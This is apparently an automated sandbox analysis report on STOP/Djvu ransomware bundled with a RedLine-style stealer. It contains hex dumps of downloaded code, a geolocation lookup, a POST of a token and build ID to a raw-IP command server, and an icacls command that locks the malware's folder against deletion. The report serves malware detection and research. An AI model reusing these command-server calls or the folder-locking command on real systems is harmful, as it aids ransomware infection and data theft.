                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                      Data Ascii: X~e!*FW|>|L1146
                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                      Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                      Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                      Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                      Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                      Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                      2024-04-24 12:42:28 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                      Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                      2024-04-24 12:42:29 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                      Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                      2024-04-24 12:42:29 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.749721104.21.65.244438128C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:30 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:42:30 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:30 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMWOIWEyJ%2BPjok8HSmCt%2B4foPBm826fYuqnG%2FflOxOmSFsojp%2FDId0yIlU0NGbp0GHuCoD4gJnTSoB2UcuMpJCk9EGQNWyNqjzbFcHcQe2xtmz5yDv9KSMGIPPfW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962c74ab8a2ed5-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:42:30 UTC455INData Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 61 65 63 36 63 62 63 32 64 65 65 65 39 63 63 37 64 65 38 30 63 33 63 62 39 31 64 64 64 62 63 63 63 34 63 62 63 64
                                                                                                                                      Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#aec6cbc2deee9cc7de80c3cb91dddbccc4cbcd
                                                                                                                                      2024-04-24 12:42:30 UTC367INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 66 39 37 39 61 39 33 38 66 62 66 63 64 39 36 38 66 64 31 38 61 39 65 63 30 38 63 38 61 39 64 39 35 39 61 39 63 38 62 63 32 63 64 39 36 38 66 64 31 38 61 39 65
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#ff979a938fbfcd968fd18a9ec08c8a9d959a9c8bc2cd968fd18a9e
                                                                                                                                      2024-04-24 12:42:30 UTC114INData Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                      Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
                                                                                                                                      2024-04-24 12:42:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.74972295.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:31 UTC261OUTPOST / HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHC
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Content-Length: 829
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:31 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 39 37 37 37 31 63 65 66 34 32 63 33 63 61 35 63 39 61 65 38 34 36 33 36 38 35 63 34 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74
                                                                                                                                      Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"5e97771cef42c3ca5c9ae8463685c457------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------KECFCGHIDHCAKEBFCFHCCont
                                                                                                                                      2024-04-24 12:42:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 12:42:32 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 5block0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.749727104.21.65.244435528C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:43:13 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:43:14 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:43:14 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jpX4h0rWPtf3t5Cg63G%2BqluAEU96qkIJhm1ZIp45bd3YEo3mNCetDIUZPvBpdrG21RY5zdhew6yrqrd5ZTSsPdgHHynIDxg2%2B7o1ZnJma%2BJN2TSiSaxU4r%2BO5Jqr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962d85ce4c2f5c-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:43:14 UTC455INData Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 61 62 32 62 66 62 36 61 61 39 61 65 38 62 33 61 61 66 34 62 37 62 66 65 35 61 39 61 66 62 38 62 30 62 66 62 39
                                                                                                                                      Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#dab2bfb6aa9ae8b3aaf4b7bfe5a9afb8b0bfb9
                                                                                                                                      2024-04-24 12:43:14 UTC367INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 65 33 38 62 38 36 38 66 39 33 61 33 64 31 38 61 39 33 63 64 39 36 38 32 64 63 39 30 39 36 38 31 38 39 38 36 38 30 39 37 64 65 64 31 38 61 39 33 63 64 39 36 38 32
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#e38b868f93a3d18a93cd9682dc90968189868097ded18a93cd9682
                                                                                                                                      2024-04-24 12:43:14 UTC114INData Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                      Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
                                                                                                                                      2024-04-24 12:43:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:14:41:59
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\qJKiVKZdFk.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:14:42:00
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\qJKiVKZdFk.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:14:42:02
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:icacls "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed" /deny *S-1-1-0:(OI)(CI)(DE,DC)
